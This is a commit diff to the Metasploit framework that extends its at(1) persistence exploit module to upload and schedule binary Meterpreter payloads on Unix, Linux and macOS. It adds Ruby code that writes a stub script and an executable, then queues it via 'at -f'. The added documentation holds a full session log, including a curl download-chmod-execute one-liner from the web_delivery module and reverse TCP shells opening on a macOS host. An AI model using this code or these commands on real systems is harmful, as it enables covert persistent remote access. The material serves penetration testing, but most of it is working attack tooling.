add binary payloads to at persistence module

h00die · h00die · commit 3be1575d3f56 · 2025-02-21T17:10:19.000-05:00
diff --git a/documentation/modules/exploit/multi/persistence/at.md b/documentation/modules/exploit/multi/persistence/at.md
@@ -1,7 +1,9 @@
 ## Vulnerable Application
 
 This module executes a metasploit payload utilizing `at(1)` to execute jobs at a specific time.  It should work out of the box
-with any UNIX-like operating system with `atd` running.  
+with any UNIX-like operating system with `atd` running.
+
+Verified on Kali linux and OSX 13.7.4
 
 ### OSX
 
@@ -119,4 +121,79 @@ Thu Feb  6 11:42:44 AM EST 2025
 [*] exec: date
 
 Thu Feb  6 11:52:20 AM EST 2025
+```
+
+### OSX 13.7.4
+
+Initial access vector via web delivery
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 8
+target => 8
+resource (/root/.msf4/msfconsole.rc)> set srvport 8383
+srvport => 8383
+resource (/root/.msf4/msfconsole.rc)> set payload payload/osx/x64/meterpreter_reverse_tcp
+payload => osx/x64/meterpreter_reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4747
+lport => 4747
+resource (/root/.msf4/msfconsole.rc)> set URIPATH m
+URIPATH => m
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4747 
+[*] Using URL: http://111.111.1.111:8383/m
+[*] Server started.
+[*] Run the following command on the target machine:
+curl -sk --output y9D7PFJd http://111.111.1.111:8383/m; chmod +x y9D7PFJd; ./y9D7PFJd& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (111.111.1.111:4747 -> 222.22.2.2:49164) at 2025-02-21 16:59:10 -0500
+
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/at 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:2 Agents:2) exploit(multi/persistence/at) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/Users/macos) > getuid
+Server username: macos
+(Meterpreter 1)(/Users/macos) > sysinfo
+Computer     : 20.20.20.21
+OS           : macOS Ventura (macOS 13.7.4)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+(Meterpreter 1)(/Users/macos) > 
+```
+
+Persistence
+
+Already run: `sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist`
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set time now +2 minutes
+time => now +2 minutes
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > set payload payload/osx/x64/meterpreter_reverse_tcp
+payload => osx/x64/meterpreter_reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/at) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(multi/persistence/at) > 
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
+[*] Writing payload to /tmp/NBcqC
+[*] Writing '/tmp/NBcqC' (25 bytes) ...
+[*] Writing '/tmp/NBcqCmk' (815032 bytes) ...
+[+] at job created with id: 7
+[*] Waiting up to sec for execution
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/20.20.20.21_20250221.0028/20.20.20.21_20250221.0028.rc
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.22.2.2:49165) at 2025-02-21 17:02:29 -0500
 ```
diff --git a/modules/exploits/multi/persistence/at.rb b/modules/exploits/multi/persistence/at.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE # for generate_payload_exe
   include Msf::Exploit::Local::Persistence
   include Msf::Exploit::Local::Timespec
   prepend Msf::Exploit::Remote::AutoCheck
@@ -20,7 +21,10 @@ def initialize(info = {})
         info,
         'Name' => 'at(1) Persistence',
         'Description' => %q{
-          This module achieves persistence by executing payloads via at(1).
+          This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time.  It should work out of the box
+          with any UNIX-like operating system with atd running.
+
+          Verified on Kali linux and OSX 13.7.4
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -29,7 +33,16 @@ def initialize(info = {})
         'Targets' => [['Automatic', {} ]],
         'DefaultTarget' => 0,
         'Platform' => %w[unix linux osx],
-        'Arch' => ARCH_CMD,
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
         'SessionTypes' => ['meterpreter', 'shell'],
         'DisclosureDate' => '1997-01-01', # http://pubs.opengroup.org/onlinepubs/007908799/xcu/at.html
         'References' => [
@@ -46,7 +59,8 @@ def initialize(info = {})
     )
 
     register_options([
-      OptString.new('TIME', [false, 'When to run job via at(1). See timespec', 'now'])
+      OptString.new('TIME', [false, 'When to run job via at(1). See timespec', 'now']),
+      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
     ])
   end
 
@@ -67,15 +81,30 @@ def check
 
   def install_persistence
     fail_with(Failure::BadConfig, "TIME option isn't valid timespec") unless Msf::Exploit::Local::Timespec.valid_timespec?(datastore['TIME'])
-    payload_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(7..12)}"
-    vprint_status("Writing payload to #{payload_file}")
-    write_file(payload_file, payload.encoded)
-    @clean_up_rc << "rm #{payload_file}\n"
+    payload_path = datastore['WritableDir']
+    payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+    payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+    payload_path << payload_name
+    vprint_status("Writing payload to #{payload_path}")
+
+    if payload.arch.first == 'cmd'
+      upload_and_chmodx(payload_path, payload.encoded)
+    else
+      # because the payloads contents is imported into the at job, we use a stub to call our payload
+      # as it doesn't like binary payloads directly
+      payload_path_exe = "#{payload_path}#{rand_text_alphanumeric(1..2)}"
+      # stub, but keep payload_path name for consistency
+      upload_and_chmodx(payload_path, "#!/bin/sh\n#{payload_path_exe} &\n")
+      upload_and_chmodx(payload_path_exe, generate_payload_exe)
+      @clean_up_rc << "rm #{payload_path_exe}\n"
+    end
+
+    @clean_up_rc << "rm #{payload_path}\n"
 
-    chmod(payload_file, 0o700)
-    job = cmd_exec("at -f #{payload_file} #{datastore['TIME']}")
+    job = cmd_exec("at -f #{payload_path} #{datastore['TIME']}")
     job_id = job.split(' ')[1]
     print_good("at job created with id: #{job_id}")
+    # this won't actually do anything since its not in a shell
     @clean_up_rc << "atrm #{job_id}\n"
 
     print_status("Waiting up to #{datastore['WfsDelay']}sec for execution")
